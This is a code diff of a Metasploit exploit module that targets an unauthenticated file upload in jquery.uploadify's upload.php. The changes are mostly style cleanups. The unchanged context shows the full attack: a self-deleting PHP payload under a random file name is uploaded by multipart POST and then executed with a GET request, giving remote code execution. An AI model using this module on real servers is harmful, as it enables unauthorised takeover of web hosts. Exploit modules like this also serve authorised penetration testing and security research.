@@ -28,10 +28,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'OSVDB', '90627' ]
         ],
         'Payload' => {
-          'BadChars' => "\x00",
+          'BadChars' => "\x00"
         },
         'Platform' => 'php',
-        'Arch'	=> ARCH_PHP,
         'Targets' => [
           [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
@@ -62,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', 'upload.php')
     })
 
-    if not res or res.code != 200
+    if !res or res.code != 200
       return Exploit::CheckCode::Safe
     end
 
@@ -77,11 +76,11 @@ class MetasploitModule < Msf::Exploit::Remote
     peer = "#{rhost}:#{rport}"
 
     @payload_name = "#{rand_text_alpha(5)}.php"
-    php_payload = get_write_exec_payload(:unlink_self => true)
+    php_payload = get_write_exec_payload(unlink_self: true)
 
     data = Rex::MIME::Message.new
-    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
-    data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\""))
+    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
+    data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, 'form-data; name="folder"'))
     post_data = data.to_s
     print_status("Uploading payload #{@payload_name}")
     res = send_request_cgi({
@@ -90,13 +89,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => post_data
     })
-    if not res or res.code != 200
+    if !res or res.code != 200
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
     upload_uri = "#{upload_dir}#{@payload_name}"
     print_status("Executing payload #{@payload_name}")
-    res = send_request_raw({
+    send_request_raw({
       'uri' => upload_uri,
       'method' => 'GET'
     })
